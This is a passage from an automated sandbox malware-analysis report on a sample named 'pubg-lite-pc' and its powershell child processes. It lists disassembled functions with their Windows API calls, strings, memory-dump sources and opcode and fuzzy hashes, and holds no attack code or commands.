                                                                                                • Opcode ID: 1cc9be383acab0e5212e4adbbae2bfd0b9eccae7148fd25793c31e1671982bc8
                                                                                                • Instruction ID: db3f577cadfa914b4a6a551095abab45af0b150375ca8bbb2e1b4f471624c18a
                                                                                                • Opcode Fuzzy Hash: 1cc9be383acab0e5212e4adbbae2bfd0b9eccae7148fd25793c31e1671982bc8
                                                                                                • Instruction Fuzzy Hash: 22317A31D04218EFDB10DFA8D946BEEB7B8EF08714F508119E811B72C0DB746A09CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00961CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00961D0F
                                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,?), ref: 00961D28
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Create
                                                                                                • String ID: tooltips_class32
                                                                                                • API String ID: 870168347-1918224756
                                                                                                • Opcode ID: f5db510c6c2421c780fce1a6db4fc3ea27a43d40e86aad8bebc8b464311afca0
                                                                                                • Instruction ID: bc67402ff3dd139c21b964eb404ab2a0add5ca9807c482cf26f6b4d1bbf5ed76
                                                                                                • Opcode Fuzzy Hash: f5db510c6c2421c780fce1a6db4fc3ea27a43d40e86aad8bebc8b464311afca0
                                                                                                • Instruction Fuzzy Hash: 850124313C1316BEF7248764DC5FFE57298E751B40F348229BB40FE0D0EAA2A915C658
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093EBAD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32(0000000F), ref: 0093EBE0
                                                                                                Strings
                                                                                                • C:\JobRelease\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 0093EBC5
                                                                                                • Unknown exception, xrefs: 0093EBB5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Parent
                                                                                                • String ID: C:\JobRelease\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                                                                • API String ID: 975332729-2259502730
                                                                                                • Opcode ID: 5142a613c7060155ec022dda69426ef21dce41b9018ace3f425add77b58674aa
                                                                                                • Instruction ID: 2d7c9b31a4a7e50dd64853e5e72afbfd36044f6123ebc40e2df9fc7f73f8e4dd
                                                                                                • Opcode Fuzzy Hash: 5142a613c7060155ec022dda69426ef21dce41b9018ace3f425add77b58674aa
                                                                                                • Instruction Fuzzy Hash: E5018430D15298EFCB00EBE4C9157DDBFB1BF55304F148098E0417B296DBB55A48DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00976BEA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32(0000000F), ref: 00976C1D
                                                                                                Strings
                                                                                                • C:\JobRelease\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00976C02
                                                                                                • Unknown exception, xrefs: 00976BF2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Parent
                                                                                                • String ID: C:\JobRelease\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                                                                • API String ID: 975332729-2259502730
                                                                                                • Opcode ID: b826431dee048c1eb5fc2c23e8139da24fd11cf84655faa1eccc6fbd0f17aad7
                                                                                                • Instruction ID: cfb18583a2b96eaf3abf8aab3e45846fca88e2e3f7e94ba66a823e7dee1641b2
                                                                                                • Opcode Fuzzy Hash: b826431dee048c1eb5fc2c23e8139da24fd11cf84655faa1eccc6fbd0f17aad7
                                                                                                • Instruction Fuzzy Hash: 5B018030D15298EFCB04EBE4C919BDEBFB1BF55304F148098E041BB29ADBB55A48DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092BE34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • Unknown exception, xrefs: 0092BE3C
                                                                                                • C:\JobRelease\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 0092BE4F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ActiveWindow
                                                                                                • String ID: C:\JobRelease\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                • API String ID: 2558294473-452454139
                                                                                                • Opcode ID: 8daa05d8457a58b81f007fbe373a10061b9067effc5714bc0547effc5adf3c59
                                                                                                • Instruction ID: 158f6280573f6fabfa11db2a9747375c6cf9490b759f878e9b0d6964177e6ba5
                                                                                                • Opcode Fuzzy Hash: 8daa05d8457a58b81f007fbe373a10061b9067effc5714bc0547effc5adf3c59
                                                                                                • Instruction Fuzzy Hash: 87019230D05298EACB05EBE4C9157DEBBB0BF55304F108098D0416B38ADBB45A08D7D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092BADE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • Unknown exception, xrefs: 0092BAE6
                                                                                                • C:\JobRelease\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 0092BAF6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ActiveWindow
                                                                                                • String ID: C:\JobRelease\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                • API String ID: 2558294473-452454139
                                                                                                • Opcode ID: 2b5b7fd17a39cf5124900a1feec96482a3ebae5bba3bde37378438e72b6100fc
                                                                                                • Instruction ID: 89bece756efabffb5e1dd4ef0109a5526ef3736bf840610096678d1a11bdd9b8
                                                                                                • Opcode Fuzzy Hash: 2b5b7fd17a39cf5124900a1feec96482a3ebae5bba3bde37378438e72b6100fc
                                                                                                • Instruction Fuzzy Hash: 19019230D15298EACB05EBE4D9157DEBFB0BF55304F108098E0416B38ADBB45A08D7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A42FDA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00931ED0: InitializeCriticalSectionAndSpinCount.KERNEL32(00B0245C,00000000,F4D3B90A,00920000,Function_00145840,000000FF,?,00A43009,?,?,?,0092651B), ref: 00931EF5
                                                                                                  • Part of subcall function 00931ED0: GetLastError.KERNEL32(?,00A43009,?,?,?,0092651B), ref: 00931EFF
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0092651B), ref: 00A4300D
                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0092651B), ref: 00A4301C
                                                                                                Strings
                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A43017
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                • API String ID: 450123788-631824599
                                                                                                • Opcode ID: dcbdf34829fd19a021d25a279e52144acaf85c0eb81b4ee2ad3bc714bad0e822
                                                                                                • Instruction ID: 71fcce9374627008b95eda3724d34e5831b800352ca1f6fd09a7a3aba1de00e2
                                                                                                • Opcode Fuzzy Hash: dcbdf34829fd19a021d25a279e52144acaf85c0eb81b4ee2ad3bc714bad0e822
                                                                                                • Instruction Fuzzy Hash: EBE06DB02003108BDB70DF65E408346BBE8AB84704F00CD1DE492C7292EBB1D904CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                Function 00007FF85AD8CB18 Relevance: .2, Instructions: 220COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5d30efee5a848d855f1048041b509aab3ce18c20e80a33b067057650493242a2
                                                                                                • Instruction ID: c2dd8730d4198f42f17308103566dad2404ab46b647f723ffb31e7ec9acfa11b
                                                                                                • Opcode Fuzzy Hash: 5d30efee5a848d855f1048041b509aab3ce18c20e80a33b067057650493242a2
                                                                                                • Instruction Fuzzy Hash: 95412531A1CA498FD749EA1CD89597177E1FFA9320B1401BED48AC7293DA25FC46C781
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8B5BC Relevance: .2, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93b756b5d1f9eddd291a988a42e629f28df3cbe88be44fadbf152826031a9e02
                                                                                                • Instruction ID: 36548d741a8c18632e3e8f75017922cca4ebef9294063eafb057d038be339a1f
                                                                                                • Opcode Fuzzy Hash: 93b756b5d1f9eddd291a988a42e629f28df3cbe88be44fadbf152826031a9e02
                                                                                                • Instruction Fuzzy Hash: DF51273190DBC68FD31AEB28C8964747FE0EF56364B1805FED08ACB1A7E925A847C741
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AE54B83 Relevance: .2, Instructions: 181COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65308272294.00007FF85AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AE50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ae50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6835443e3c03d2f9d747a46c28566cc02032aaaa357514131f003a7043b2557
                                                                                                • Instruction ID: 2c4d9a71c84bbaaf629e95a0cab6d0c46c37852c0db8db06f69f138cb0813a82
                                                                                                • Opcode Fuzzy Hash: b6835443e3c03d2f9d747a46c28566cc02032aaaa357514131f003a7043b2557
                                                                                                • Instruction Fuzzy Hash: A9510B72E0CA564FF7E9EA1CA4916B837D2EF89272B5C01FAC24EC7197DE15E8058341
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8A205 Relevance: .1, Instructions: 135COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e08d685c6e94d543dfe54455db92e61f6c0a96b6ce0aadeec1043a11b000bbf7
                                                                                                • Instruction ID: 5796b579e299a77e0a3253b92a86f4deea437a6674c3d26ac0b3a7cee25b1e86
                                                                                                • Opcode Fuzzy Hash: e08d685c6e94d543dfe54455db92e61f6c0a96b6ce0aadeec1043a11b000bbf7
                                                                                                • Instruction Fuzzy Hash: D631287191CB488FDB189B5C98066A97BE0FBAA321F04425FE449C3262DB74A855CBC3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AC6EB89 Relevance: .1, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65305531062.00007FF85AC6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AC6D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ac6d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 79cfadd77d55f1479ea723064e126cafe31783ee7ca503e522fb5bd5be2e58f4
                                                                                                • Instruction ID: 63e4e7a22cfd909eeb2ea4d8518823238448fcbaadbfb799430163216f8f2339
                                                                                                • Opcode Fuzzy Hash: 79cfadd77d55f1479ea723064e126cafe31783ee7ca503e522fb5bd5be2e58f4
                                                                                                • Instruction Fuzzy Hash: 7241137080DBC45FE356CB28A8819523FF4EF53260B1905DFD089CB1A7D629A806C792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8AD48 Relevance: .1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cde39a0e48885347d3de91c90321473524a146310e58febbf5680933a89923b9
                                                                                                • Instruction ID: 2aa390668222cf7111cc96047c746a2e355720efc948605668af8397a3377e6b
                                                                                                • Opcode Fuzzy Hash: cde39a0e48885347d3de91c90321473524a146310e58febbf5680933a89923b9
                                                                                                • Instruction Fuzzy Hash: FF21293190CB4C8FEB58DFAC984A7E97BE0EB96331F04426FD448C3166D674A456CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AE54BCF Relevance: .1, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65308272294.00007FF85AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AE50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ae50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03807b497f29ea611e918c5573043b3f87eff8a0c65939173ec21e71d05a72bd
                                                                                                • Instruction ID: a46895f788ed03f167480ed973f3c6f9cd6cd29f4f34d92d1661ba52aced4382
                                                                                                • Opcode Fuzzy Hash: 03807b497f29ea611e918c5573043b3f87eff8a0c65939173ec21e71d05a72bd
                                                                                                • Instruction Fuzzy Hash: 4C21B972E0DA674FF6E5E61C64D017826D2EF89362B5D01FAC24EC7197CE19EC058741
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD847F5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6bfdecb3d59783edb8d5ece0825f48c00fea2b04cd29938ad24c1b975959738
                                                                                                • Instruction ID: 8f73f81d122fc6c87d7b1120b056049cdeb6ef2e037e91c67ed0c7f5d4dc01c6
                                                                                                • Opcode Fuzzy Hash: c6bfdecb3d59783edb8d5ece0825f48c00fea2b04cd29938ad24c1b975959738
                                                                                                • Instruction Fuzzy Hash: 6501447111CB0C8FD748EF0CE451AA5B7E0FF95364F10056DE59AC3651D636E881CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8AB88 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 300d3e484a62d36e684eb1b4d74e5b49561b67549257f93ba378efd35940e01c
                                                                                                • Instruction ID: 97ef808abd1559a24a3a890c3812b3cecfc492921b7a6542cc1157dfbb49f40f
                                                                                                • Opcode Fuzzy Hash: 300d3e484a62d36e684eb1b4d74e5b49561b67549257f93ba378efd35940e01c
                                                                                                • Instruction Fuzzy Hash: 86F02B318086894FDB06DF28984A4E57FA0EF16261F050297E418C7061DB64A455C7C2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8CCC8 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 75f8619b2ba4ebcab9c3c9e6ba1487a9dc9cda2e1e6fee27aa3ee9d159eb3f52
                                                                                                • Instruction ID: 4b8dae193a519495c011b543993c5f754fc9b61e1f42d82bfdb28eeb02b574cf
                                                                                                • Opcode Fuzzy Hash: 75f8619b2ba4ebcab9c3c9e6ba1487a9dc9cda2e1e6fee27aa3ee9d159eb3f52
                                                                                                • Instruction Fuzzy Hash: 40F0653275C6098FDB5CEA1CF8429B573D1EB99330B00017EF88BC2697D927F8428A85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AC6EC99 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65305531062.00007FF85AC6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AC6D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ac6d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0b6a0f24e9a12cee383ff22fe97555b014bb4915ef72accb2553311598ab8106
                                                                                                • Instruction ID: 393a8d537333032d655b4d04fb81fa8e5784ecbf2f2af8078c29b7c913a36ba5
                                                                                                • Opcode Fuzzy Hash: 0b6a0f24e9a12cee383ff22fe97555b014bb4915ef72accb2553311598ab8106
                                                                                                • Instruction Fuzzy Hash: A2F01570519908DFCB95EA6DC085D2537E1FF18350B5408A8E04ACB2A1D624FC86CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD87A78 Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8eb804f932172c728203193f275e503c3f5a9f225af421e8c4df49b04534423a
                                                                                                • Instruction ID: 1ddd7db525aea6cb1daafe89853981d0ebd7c48a7dcdccbef258dca69defa778
                                                                                                • Opcode Fuzzy Hash: 8eb804f932172c728203193f275e503c3f5a9f225af421e8c4df49b04534423a
                                                                                                • Instruction Fuzzy Hash: 47E04631810A0C8F8B44EF18D8099EA77A0FB28305B01029BA80ED3120DB30AA58CBC2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8868D Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2cf519a931bcef4422c95d1b0b9525ee9899054589e2156c4ae16156349ae4b4
                                                                                                • Instruction ID: 078db52b56ddb2a42424578b699b7cc2908e7f53a8239bcdeba67dfc9f0272d6
                                                                                                • Opcode Fuzzy Hash: 2cf519a931bcef4422c95d1b0b9525ee9899054589e2156c4ae16156349ae4b4
                                                                                                • Instruction Fuzzy Hash: 39E0C22064C7864FD244A22CA0807BE7BC1EFC53A0F5848BDF4CE83393CA5DA8825352
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 00007FF85AD8587F Relevance: 5.4, Strings: 4, Instructions: 439COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.65306910774.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: T_I$T_I$T_I$T_I
                                                                                                • API String ID: 0-3247691911
                                                                                                • Opcode ID: 6106261074ebd9b1a5bdfa379726248a8c162c310beb401e241f79aeb25a86ce
                                                                                                • Instruction ID: 59c770d37e38086cdf0b9d78d3bb3a8b69c52c4ef5689f621641d64184fa75d6
                                                                                                • Opcode Fuzzy Hash: 6106261074ebd9b1a5bdfa379726248a8c162c310beb401e241f79aeb25a86ce
                                                                                                • Instruction Fuzzy Hash: BAC10953E0F9C35BE15956AC3CA61BA2BA2FF52EF071C01FBD0488B09FB9049D064299
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                Function 00007FF85AD8A125 Relevance: .1, Instructions: 134COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65599845342.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 624bc9e270f40506920790f5c85ad9f5306e3646db700ee8cb7c4b13d1305f79
                                                                                                • Instruction ID: f0a05f77156dd6161090952f5f96fee69c230f73a5bdf200aea3065f1babd1d2
